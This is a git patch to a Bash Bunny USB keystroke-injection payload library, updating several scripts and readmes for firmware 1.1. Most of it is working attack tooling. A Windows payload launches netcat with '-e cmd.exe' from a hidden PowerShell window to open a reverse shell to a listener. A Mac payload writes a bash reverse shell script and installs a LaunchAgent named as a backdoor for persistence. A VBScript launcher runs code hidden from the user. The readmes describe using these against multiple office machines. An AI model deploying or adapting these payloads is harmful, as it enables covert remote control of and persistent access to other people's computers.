From 750d384df7e6b9c0056992499cbbd8468f6747b6 Mon Sep 17 00:00:00 2001 From: RalphyZ Date: Fri, 28 Apr 2017 18:49:35 -0400 Subject: [PATCH] Updated payloads for fw v1.1 (#176) * Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Mac Reverse Shell Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, s.sh. It then runs the script in the background and closes the terminal window. * Added variables for IP and Port of the Netcat Listener For ease of use, variables were added at the top for the IP Address and Port of the Netcat Listener. Change those values to your listener and no other edits should be needed. * Added persistence (and a reason to have a dropper) This payload creates a bash reverse shell inside a script and adds persistence by adding the script to the Mac Launch Agent at a user defined interval. * Fixed additional MacReverseShell * Added readme.md files * Added readme.md files * Added readme.md * Added readme.md files * Added readme.md files * Updated for firmware 1.1 * Updated for firmware 1.1 * Added ThemeChanger and updated for firmware 1.1 * Updated readme.md * Updated for firmware 1.1 - using RUN command * Fixed issues with the new RUN - reverted * Fixed a few script problems * removed binary and updated readme.md * added a check for themepack * edited themechanger readme * updated readme.md and version --- payloads/library/execution/RAZ_VBScript/a.vbs | 35 +++++++------- .../execution/RAZ_VBScript/payload.txt | 35 +++++++++----- .../library/execution/RAZ_VBScript/readme.md | 31 ++++++++++++ .../prank/RAZ_ThemeChanger/payload.txt | 48 +++++++++++++++++++ .../library/prank/RAZ_ThemeChanger/readme.md | 34 +++++++++++++ .../RAZ_MacReverseShell/payload.txt | 25 ++++++---- .../RAZ_MacReverseShell/readme.md | 39 +++++++++++++++ .../RAZ_ReverseShell/payload.txt | 42 +++++++++------- .../remote_access/RAZ_ReverseShell/readme.md | 44 +++++++++++++++++ 9 files changed, 278 insertions(+), 55 deletions(-) create mode 100644 payloads/library/execution/RAZ_VBScript/readme.md create mode 100644 payloads/library/prank/RAZ_ThemeChanger/payload.txt create mode 100644 payloads/library/prank/RAZ_ThemeChanger/readme.md create mode 100644 payloads/library/remote_access/RAZ_MacReverseShell/readme.md create mode 100644 payloads/library/remote_access/RAZ_ReverseShell/readme.md diff --git a/payloads/library/execution/RAZ_VBScript/a.vbs b/payloads/library/execution/RAZ_VBScript/a.vbs index fd1a23a6..7d669b42 100644 --- a/payloads/library/execution/RAZ_VBScript/a.vbs +++ b/payloads/library/execution/RAZ_VBScript/a.vbs @@ -3,7 +3,7 @@ Option Explicit '============================================================================== ' Title: a.vbs ' Author: RalphyZ -' Version: 1.0 +' Version: 1.1 ' Target: Windows 7+ ' ' Description: @@ -16,7 +16,8 @@ Option Explicit ' listeners while doing a PenTest, and grab multiple reverse ' shells in one trip. Uncomment that if you want the auto-increment ' -' Note: You must put the netcat executable in the strReverseShellPath directory +' Note: You must put the netcat executable in the switch directory with this +' script in order for it to work '============================================================================== ' Declare Constants @@ -26,14 +27,11 @@ Const ForWriting = 2 ' Declare Global Variables Dim strListenerPort, strNewListenerPort, strListenerIP Dim objFSO, objFile, strCurrentDirectory -Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile +Dim strNetCatEXE, strListnerPortFile, strListenerIPFile ' The netcat executable name strNetCatEXE = "nc.exe" -' The folder location -strReverseShellPath = "\payloads\library\RAZ_ReverseShell\" - ' The file containing the listener port strListnerPortFile = "listener_port.txt" @@ -43,7 +41,11 @@ strListenerIPFile = "listener_ip.txt" ' Create a File System Object Set objFSO = CreateObject("Scripting.FileSystemObject") -strCurrentDirectory = FindCurrentDirectory() +' Set default value +strCurrentDirectory = "" + +' The folder location +FindCurrentDirectory ' Read the Host IP Address (where the listener resides) ReadHostIP @@ -64,20 +66,21 @@ StartNetCat ' Return Value: None ' Description: Find the netcat executable '============================================================================== -Function FindCurrentDirectory +sub FindCurrentDirectory Dim objDrives, d - - ' Set default return value - FindCurrentDirectory = "" - + ' Search all drives for the netcat exe Set objDrives = objFSO.Drives - For Each d in objDrives - If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then - FindCurrentDirectory = d + strReverseShellPath + For Each d in objDrives + If (objFSO.FileExists(d + "\payloads\switch1\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch1\" + exit sub + ElseIf (objFSO.FileExists(d + "\payloads\switch2\" + strNetCatEXE)) Then + strCurrentDirectory = d + "\payloads\switch2\" + exit sub End if Next -End Function +End Sub '============================================================================== ' Name: ReadHostIP diff --git a/payloads/library/execution/RAZ_VBScript/payload.txt b/payloads/library/execution/RAZ_VBScript/payload.txt index b395f94f..ab24bd09 100644 --- a/payloads/library/execution/RAZ_VBScript/payload.txt +++ b/payloads/library/execution/RAZ_VBScript/payload.txt @@ -2,34 +2,45 @@ # # Title: RAZ_VBScript # Author: RalphyZ -# Version: 1.0 +# Version: 1.1 # Target: Windows 7+ # Dependencies: VBScript (a.vbs) in the switch folder with this file # # Description: Executes a VBScript, concealed in a hidden PowerShell window # # Colors: -# Green.....................Working -# White.....................Completed without error -# Light-Blue (blinking).....a.vbs was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL | Red slow blink | Could not find the a.vbs script | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | -LED G +# Magenta solid +LED SETUP + +# Set the attack mode ATTACKMODE HID STORAGE # Get the switch position -source bunny_helpers.sh +GET SWITCH_POSITION -# Check if a.vbs is present -if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then - LED B G 100 + Check if a.vbs is present + if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then + LED FAIL exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Run the VBScript QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')" +QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs') -e cmd.exe" QUACK ENTER -# Green LED for finished -LED R G B \ No newline at end of file + +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/execution/RAZ_VBScript/readme.md b/payloads/library/execution/RAZ_VBScript/readme.md new file mode 100644 index 00000000..3e0287ef --- /dev/null +++ b/payloads/library/execution/RAZ_VBScript/readme.md @@ -0,0 +1,31 @@ +# RAZ_VBScript +* Author: RalphyZ +* Version: 1.1 +* Target: Windows 7+ +* Category: Execution +* Attackmode: HID, STORAGE + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.1 | Updated for firmware 1.1 | +| 1.0 | Initial release | + +## Dependencies +The following files must exist in the switch folder: + +a.vbs - VBScript to be executed in a hidden Powershell window + +## Description +VBScript (a.vbs) in the switch folder with this file + +## Configuration +None + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| FAIL | Red slow blink | Could not find the a.vbs script | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file diff --git a/payloads/library/prank/RAZ_ThemeChanger/payload.txt b/payloads/library/prank/RAZ_ThemeChanger/payload.txt new file mode 100644 index 00000000..58e61540 --- /dev/null +++ b/payloads/library/prank/RAZ_ThemeChanger/payload.txt @@ -0,0 +1,48 @@ +#!/bin/bash +# +# Title: Change windows theme +# Author: sil3n7h +# Version: 1.2 +# Target: Windows 7+ +# +# Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder +# in the payloads library of the Bash Bunny USB Disk partition. +# +# Colors: +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL1 | Red slow blink | Could not find the theme.themepack file | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | + +# Magenta solid +LED SETUP + +# Get the switch position +GET SWITCH_POSITION + +# Check for all the files - error if not found. If found, put into variables +if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/theme.themepack" ] ; then + LED FAIL1 + exit 1 +fi + +# Set the attack mode to HID and STORAGE +ATTACKMODE HID STORAGE + +# Yellow single blink +LED ATTACK + +# Run the command to change the theme +QUACK GUI r +QUACK DELAY 100 +QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\theme.themepack')" +QUACK ENTER + +# Wait a bit so that the correct window closes +QUACK DELAY 15000 +QUACK ALT F4 + +# Green LED for finished +LED FINISH \ No newline at end of file diff --git a/payloads/library/prank/RAZ_ThemeChanger/readme.md b/payloads/library/prank/RAZ_ThemeChanger/readme.md new file mode 100644 index 00000000..7d9f2645 --- /dev/null +++ b/payloads/library/prank/RAZ_ThemeChanger/readme.md @@ -0,0 +1,34 @@ +# RAZ_ThemeChanger +* Author: sil3n7h +* Version: 1.2 +* Target: Windows 7+ +* Category: Prank +* Attackmode: HID, STORAGE + +## Change Log +| Version | Changes | +| ------- | ---------------------------------------| +| 1.2 | Updated docs and check for themepack | +| 1.1 | Updated for firmware 1.1 | +| 1.0 | Initial release | + +## Dependencies +The following files must exist in the switch folder: + +theme.themepack - The Windows theme file used to set the wallpaper and colors of the screen. + +Note: themepack files are windows zipfiles which contain wallpapers and other files (screensavers, sounds, etc). You can export your own themepack using Windows GUIs. Just look it up `exporting a windows themepack`. + +## Description +Executes theme file (theme.themepack) from the RAZ_ThemeChanger folder in the payloads library of the Bash Bunny USB Disk partition. + +## Configuration +None + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| FAIL1 | Red slow blink | Could not find the theme.themepack file | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt index 8c370623..2b384024 100644 --- a/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt +++ b/payloads/library/remote_access/RAZ_MacReverseShell/payload.txt @@ -2,7 +2,7 @@ # # Title: RAZ_MacReverseShell # Author: RalphyZ -# Version: 1.1 +# Version: 1.2 # Target: Mac OSX # Dependencies: None # @@ -12,8 +12,14 @@ # user-defined interval # # Colors: -# Green (blinking)..........Working -# White.....................Completed without error +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | + +#Magenta solid +LED SETUP # Edit this to point to the NetCat Listener LISTENER_IP="192.168.1.100" @@ -24,15 +30,15 @@ FREQUENCY="60" #----Proceed with Caution------------------------------------------------------ -# Green blinking LED -LED G 100 - # Human Interface Device ATTACKMODE HID # Emulate the Ducky - QUACK! QUACK DEFAULT_DELAY 300 +# Start the attack - yellow single blink +LED ATTACK + # Start the Mac Terminal QUACK COMMAND SPACE QUACK STRING terminal @@ -53,7 +59,7 @@ QUACK ENTER QUACK DELAY 500 # Add to the Launch Agents -QUACK STRING printf \"\\\n \\\n \Label\\\n \com.ralphyz.backdoor\\\n \ProgramArguments\\\n \\\n \/bin/sh\\\n \/tmp/s.sh\\\n \\\n \RunAtLoad\\\n \\\n \StartInterval\\\n \${FREQUENCY}\\\n \AbandonProcessGroup\\\n \\\n \\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist +QUACK STRING printf \"\\\Label\\com.ralphyz.backdoor\\ProgramArguments\\\/bin/sh\\/tmp/s.sh\\\RunAtLoad\\\StartInterval\\${FREQUENCY}\\AbandonProcessGroup\\\\\n\\" \> \~/Library/LaunchAgents/com.ralphyz.backdoor.plist QUACK ENTER QUACK DELAY 500 @@ -64,5 +70,6 @@ QUACK ENTER # Close the Terminal Window QUACK COMMAND q -# White LED for finished -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH +exit 0 \ No newline at end of file diff --git a/payloads/library/remote_access/RAZ_MacReverseShell/readme.md b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md new file mode 100644 index 00000000..2e02f431 --- /dev/null +++ b/payloads/library/remote_access/RAZ_MacReverseShell/readme.md @@ -0,0 +1,39 @@ +# RAZ_MacReverseShell +* Author: RalphyZ +* Version: Version 1.1.1 +* Target: Mac OSX +* Category: Reverse Shell +* Attackmode: HID + +## Change Log +| Version | Changes | +| ------- | ---------------------------------------- | +| 1.1.1 | Updated for firmware 1.1.1 | +| 1.1 | Added variables for easier customization | +| 1.0 | Initial release | + +## Dependencies +None + +## Description +Starts a terminal window on a Mac,then creates a bash reverse shell inside a script, /tmp/s.sh. It then adds the script to the Launch Agent - establishing persistence - running at startup + +## Configuration +Set the location of your listener: + +LISTENER_IP="192.168.1.100" + +LISTENER_PORT="4444" + + +Set the frequency you want the script to run (in minutes) + +FREQUENCY="60" + +## Colors +| Status | Color | Description | +| --------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | + diff --git a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt index 8b71a3d0..f97c94d7 100644 --- a/payloads/library/remote_access/RAZ_ReverseShell/payload.txt +++ b/payloads/library/remote_access/RAZ_ReverseShell/payload.txt @@ -13,63 +13,69 @@ # Intentionally, this script leaves a trace in the Run Box # # Colors: -# Green.....................Working -# White.....................Completed without error -# White (blinking)..........Incrementing the port in listener_port.txt -# Blue (blinking)...........listener_port.txt was not found -# Light-Blue (blinking).....listener_ip.txt was not found -# Amber (blinking)..........nc.exe was not found +# | Status | Color | Description | +# | ---------- | ------------------------------| ------------------------------------------------ | +# | SETUP | Magenta solid | Setting attack mode, getting the switch position | +# | FAIL1 | Red slow blink | Could not find the listener_port.txt file | +# | FAIL2 | Red fast blink | Could not find the listener_ip.txt file | +# | FAIL3 | Red very fast blink | Could not find the nc.exe file | +# | SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | +# | ATTACK | Yellow single blink | Running the VBScript | +# | FINISH | Green blink followed by SOLID | Script is finished | +# Magenta solid +LED SETUP # Change this if you want to enable auto_increment of the netcat port # If true, the port number is increased by 1 everytime the script runs # This is good for Red Teams doing PenTesting on multiple computers auto_increment=false -LED G +# Set attack mode to HID and Storage ATTACKMODE HID STORAGE -LANGUAGE='us' - # Get the switch position -source bunny_helpers.sh - +GET SWITCH_POSITION # Check for all the files - error if not found. If found, put into variables if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt" ] ; then - LED B 100 + LED FAIL1 exit 1 else my_port=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt" ] ; then - LED B G 100 + LED FAIL2 exit 1 else my_ip=`cat /root/udisk/payloads/${SWITCH_POSITION}/listener_ip.txt` fi if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/nc.exe" ] ; then - LED R G 100 + LED FAIL3 exit 1 fi +# Start the attack - yellow single blink +LED ATTACK + # Execute the powershell command in the run box with the appropriate variables QUACK GUI r QUACK DELAY 100 -QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe" +QUACK STRING powershell -WindowStyle Hidden \".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\nc.exe') -nv ${my_ip} ${my_port} -e cmd.exe\" QUACK ENTER + # If auto_increment, then update the listener_port file if [ "$auto_increment" = true ] ; then - LED R G B 100 + LED SPECIAL echo $((my_port + 1)) > /root/udisk/payloads/${SWITCH_POSITION}/listener_port.txt # Allow the write to sync to the USB sleep 1 fi -# Signal everything went OK - white -LED R G B +# Green 1000ms VERYFAST blink followed by SOLID +LED FINISH exit 0 diff --git a/payloads/library/remote_access/RAZ_ReverseShell/readme.md b/payloads/library/remote_access/RAZ_ReverseShell/readme.md new file mode 100644 index 00000000..f2f2aa3d --- /dev/null +++ b/payloads/library/remote_access/RAZ_ReverseShell/readme.md @@ -0,0 +1,44 @@ +# RAZ_ReverseShell +* Author: RalphyZ +* Version: 1.1 +* Target: Windows 7+ +* Category: Reverse Shell +* Attackmode: HID, STORAGE + +## Change Log +| Version | Changes | +| ------- | ------------------------------| +| 1.1 | Updated for firmware 1.1 | +| 1.0 | Initial release | + +## Dependencies +The following files must exist in the switch folder: + +nc.exe - Windows binary for netcat with the -e flag + +Find nc.exe on Kali, or on NMap's website: http://nmap.org/ncat + +listener_port.txt - The Port number for the netcat listener + +listener_ip.txt - The IP Address for the netcat listener + +## Description +Executes a netcat reverse cmd shell at a given IP and Port. This script leaves a trace in the Run Box. The script can auto-increment the listener port so that the PenTester can create several listeners, and target multiple machines while on a walkabout in an office. + +## Configuration +Set the location of your listener in the listener_ip and listener_port text files. + +If you want the listener port to auto-increment, set: + +auto_increment=true + +## Colors +| Status | Color | Description | +| ---------- | ------------------------------| ------------------------------------------------ | +| SETUP | Magenta solid | Setting attack mode, getting the switch position | +| FAIL1 | Red slow blink | Could not find the listener_port.txt file | +| FAIL2 | Red fast blink | Could not find the listener_ip.txt file | +| FAIL3 | Red very fast blink | Could not find the nc.exe file | +| SPECIAL | Cyan inverted single blink | Incrementing the port in listener_port.txt | +| ATTACK | Yellow single blink | Running the VBScript | +| FINISH | Green blink followed by SOLID | Script is finished | \ No newline at end of file